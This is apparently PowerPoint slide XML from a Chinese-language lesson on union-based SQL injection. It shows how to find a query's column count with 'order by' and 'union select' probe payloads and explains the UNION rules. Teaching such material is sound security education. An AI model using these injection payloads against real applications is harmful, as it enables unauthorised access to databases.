          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAAC0692-DAC5-41B7-9C4D-E8D83DFD7F5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539259" y="1140293"/>
            <a:ext cx="5008844" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>联合查询注入（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>union select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14497A2A-59AE-4BFD-BC14-574301E109FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116207" y="1688153"/>
            <a:ext cx="2811753" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> 猜解查询的列数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEF6E2F8-1FBD-49CA-BC44-1D076CE27C27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368489" y="4632846"/>
            <a:ext cx="2491123" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> 方法二：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>union</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8422181-1A76-49EC-95FF-66ED3E48E1A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4835115" y="1729207"/>
            <a:ext cx="7496847" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>username,password,xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> where id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8762585C-DFDF-4BBE-ADAF-EEFBF680943D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1632765" y="5116977"/>
            <a:ext cx="6524698" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>= 0 union select 1         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>报错</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="文本框 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36830614-F1DF-4796-9004-C9413084F109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1632765" y="5525827"/>
            <a:ext cx="6524698" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>= 0 union select 1,2      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>报错</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC5D6F76-6CC3-4BF1-9DDC-152877871670}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1632765" y="5963857"/>
            <a:ext cx="6979130" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>= 0 union select 1,2,3   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>不报错</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC0D2E5E-462B-4623-9127-076EBD6409B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7388153" y="5555007"/>
            <a:ext cx="3046547" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询的列数为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D68CB73-0144-4812-985A-FEF731B96F64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="413440" y="2266066"/>
            <a:ext cx="4917800" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> 方法一：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>order by</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="文本框 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39051ED6-B80F-486B-996D-082D2117BB1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1830750" y="2664107"/>
            <a:ext cx="6524698" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>= 1 order by 1                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>不报错</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="文本框 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5092582E-0374-4F13-9C0C-F21629199F11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1830750" y="3064415"/>
            <a:ext cx="6524698" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>= 1 order by 2                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>不报错</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="文本框 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F2D38A6-18CE-4916-9390-91A197B72B54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1818536" y="3507913"/>
            <a:ext cx="6979130" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>= 1 order by 3                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>不报错</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="文本框 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{130EB2F0-B68D-4EBE-B07C-A790DE1648AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7608750" y="3301751"/>
            <a:ext cx="3046547" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询的列数为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="文本框 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{912C465B-5C3C-4DA5-AEF1-994F3B6037FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1830960" y="3945709"/>
            <a:ext cx="6979130" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>= 1 order by 4                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>报错</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="434218644"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485084" y="416902"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
